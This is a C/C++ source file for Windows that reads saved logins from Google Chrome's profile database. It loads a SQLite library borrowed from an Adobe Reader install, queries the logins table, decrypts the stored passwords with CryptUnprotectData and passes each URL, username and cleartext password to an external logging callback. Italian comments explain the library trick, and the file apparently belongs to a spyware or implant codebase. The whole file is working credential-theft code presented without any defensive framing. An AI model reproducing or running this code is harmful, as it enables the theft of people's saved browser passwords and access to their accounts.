
#define _CRT_SECURE_NO_WARNINGS 1

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <windows.h>
#include <userenv.h>
#include <shlobj.h>
#pragma comment(lib,"userenv.lib")

// callback for the password
extern int LogPassword(WCHAR *resource, WCHAR *service, WCHAR *user, WCHAR *pass);

// SQLITE Library functions
typedef int (*sqlite3_open)(const char *, void **);
typedef int (*sqlite3_close)(void *);
typedef int (*sqlite3_exec)(void *, const char *, int (*callback)(void*,int,char**,char**), void *, char **);

sqlite3_open	chrome_SQLITE_open = NULL;
sqlite3_close	chrome_SQLITE_close = NULL;
sqlite3_exec	chrome_SQLITE_exec = NULL;

HMODULE libsqlch = NULL;
HMODULE libtmpch = NULL;

#define SAFE_FREE(x) do { if (x) {free(x); x=NULL;} } while (0);

extern int DirectoryExists(WCHAR *path);

HMODULE LoadLibraryCH(WCHAR *firefoxDir, char *libName)
{
	char loadPath[MAX_PATH];

	sprintf_s(loadPath, MAX_PATH, "%S\\%s", firefoxDir, libName);

    if (!(libtmpch = LoadLibrary(loadPath)))
		return NULL; 

    return libtmpch;
}


int InitCHLibs(WCHAR *SQLDir)
{
	if (SQLDir == NULL ) 
		return 0;

	if (!(libsqlch = LoadLibraryCH(SQLDir, "sqlite.dll"))) {
		return 0;
	}

	// sqlite functions
	chrome_SQLITE_open = (sqlite3_open) GetProcAddress(libsqlch, "sqlite3_open");
	chrome_SQLITE_close = (sqlite3_close) GetProcAddress(libsqlch, "sqlite3_close");
	chrome_SQLITE_exec = (sqlite3_exec) GetProcAddress(libsqlch, "sqlite3_exec");

	if (!chrome_SQLITE_open || !chrome_SQLITE_close || !chrome_SQLITE_exec) {
		return 0;
	}

	return 1;
}



struct chp_entry {
	WCHAR service[64];
	WCHAR resource[255];
	WCHAR user_name[255];
	WCHAR user_value[255];
	WCHAR pass_name[255];
	WCHAR pass_value[255];
};


int DecryptPass(CHAR *cryptData, WCHAR *clearData, UINT clearSize)
{
	DATA_BLOB input;
	input.pbData = const_cast<BYTE*>(reinterpret_cast<const BYTE*>(cryptData));
	input.cbData = static_cast<DWORD>(0xd0);
	DATA_BLOB output;

	if (!CryptUnprotectData(&input, NULL, NULL, NULL, NULL, 0, &output))
		return 0;

	CHAR *decrypted = (CHAR *)malloc(clearSize);
	if (!decrypted) {
		LocalFree(output.pbData);
		return 0;
	}

	memset(decrypted, 0, clearSize);
	memcpy(decrypted, output.pbData, (clearSize < output.cbData) ? clearSize - 1 : output.cbData);
	
	_snwprintf_s(clearData, clearSize, _TRUNCATE, L"%S", decrypted);

	free(decrypted);
	LocalFree(output.pbData);

	return 1;
}

int parse_chrome_signons(void *NotUsed, int argc, char **argv, char **azColName)
{
	struct chp_entry chentry;
	
	for(int i=0; i<argc; i++){
		if (!strcmp(azColName[i], "origin_url")) {
			swprintf_s(chentry.service, 255, L"Chrome");
			_snwprintf_s(chentry.resource, 255, _TRUNCATE, L"%S", argv[i]);
		}
		if (!strcmp(azColName[i], "username_value")) {
			_snwprintf_s(chentry.user_value, 255, _TRUNCATE, L"%S", argv[i]);
		}
		if (!strcmp(azColName[i], "password_value")) {
			DecryptPass(argv[i], chentry.pass_value, 255);
		}
	}

	LogPassword(chentry.service, chentry.resource, chentry.user_value, chentry.pass_value);
	
	return 0;
}

int DumpSqlCH(WCHAR *profilePath, WCHAR *signonFile)
{
	void *db;
	CHAR sqlPath[MAX_PATH];
	int rc;

	if (chrome_SQLITE_open == NULL)
		return 0;

	sprintf_s(sqlPath, MAX_PATH, "%S\\%S", profilePath, signonFile);

	if ((rc = chrome_SQLITE_open(sqlPath, &db)))
		return 0;

	chrome_SQLITE_exec(db, "SELECT * FROM logins;", parse_chrome_signons, NULL, NULL);

	chrome_SQLITE_close(db);

	return 1;
}

WCHAR *FindSQLlib()
{
	// dobbiamo trovare qualche programma che usi SQLite per caricare la DLL.
	// acrobat reader la usa, quindi cerchiamo lui. speriamo di trovarne altri che la usino.
	// non possiamo importare sqlite perche' il codice sarebbe troppo grosso.
	// se ci va bene che la troviamo, la usiamo, altrimenti niente password per chrome.

	static WCHAR FullPath[MAX_PATH];
	char regSubKey[]    = "SOFTWARE\\Adobe\\Acrobat Reader";
	char path[MAX_PATH];
	WCHAR keyname[MAX_PATH];
	WCHAR subkey[MAX_PATH];
	char *p;
	DWORD pathSize = MAX_PATH;
	DWORD valueType;
	HKEY rkey;

	if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
		return NULL;

	if (RegEnumKeyW(rkey, 0, keyname, MAX_PATH) != ERROR_SUCCESS)
		return NULL;

	RegCloseKey(rkey);

	_snwprintf_s(subkey, MAX_PATH, L"%S\\%s\\InstallPath", regSubKey, keyname);

	if( RegOpenKeyExW(HKEY_LOCAL_MACHINE, subkey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
		return NULL;

	if( RegQueryValueEx(rkey, NULL, 0,  &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS ) {
        RegCloseKey(rkey);
        return NULL;
    }

	RegCloseKey(rkey);

    if( pathSize <= 0 || path[0] == 0) {
		return NULL;
	}

	// get the path and then remove the initial \"
	if ((p = strrchr(path, '\"')) != NULL)
		*p = '\0';

	p = path;
	
	if( *p == '\"' ) 
		p++;

	if (!p)
		return NULL;

	_snwprintf_s(FullPath, MAX_PATH, L"%S", p);		

	return FullPath;
}

WCHAR *GetCHProfilePath()
{
	WCHAR appPath[MAX_PATH];
	static WCHAR FullPath[MAX_PATH];

	if (!SHGetSpecialFolderPathW(NULL, appPath, CSIDL_LOCAL_APPDATA, TRUE))
		return NULL;

	_snwprintf_s(FullPath, MAX_PATH, L"%s\\Google\\Chrome\\User Data\\Default", appPath);

	return FullPath;
}


int DumpChrome(void)
{
	WCHAR *ProfilePath = NULL; 	//Profile path
	WCHAR *SQLDir = NULL;   	//SQLITE library path (if found)

	ProfilePath = GetCHProfilePath();

	if (ProfilePath == NULL || !DirectoryExists(ProfilePath)) 
		return 0;
	
	SQLDir = FindSQLlib();
	
	if (SQLDir == NULL || !InitCHLibs(SQLDir))	
		return 0;

	DumpSqlCH(ProfilePath, L"Web Data"); 

	return 0;
}
